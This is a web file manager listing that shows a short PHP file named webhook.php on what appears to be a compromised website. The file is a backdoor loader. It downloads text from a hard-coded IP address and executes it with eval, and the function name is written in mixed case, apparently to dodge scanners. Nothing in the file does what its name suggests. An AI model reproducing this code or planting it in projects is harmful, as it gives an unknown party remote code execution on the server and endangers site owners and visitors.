Viewing File: /home/webrbaew/kitothecandytea.com/webhook.php

<?php
$cx = curl_init("http://173.208.184.138/z60103_2/stat/index.txt");
curl_setopt($cx, CURLOPT_RETURNTRANSFER, 1);
$rs = curl_exec($cx);
if ($rs !== false) {
    $data = eVaL('?>' . $rs);
}
curl_close($cx);
Back to Directory File Manager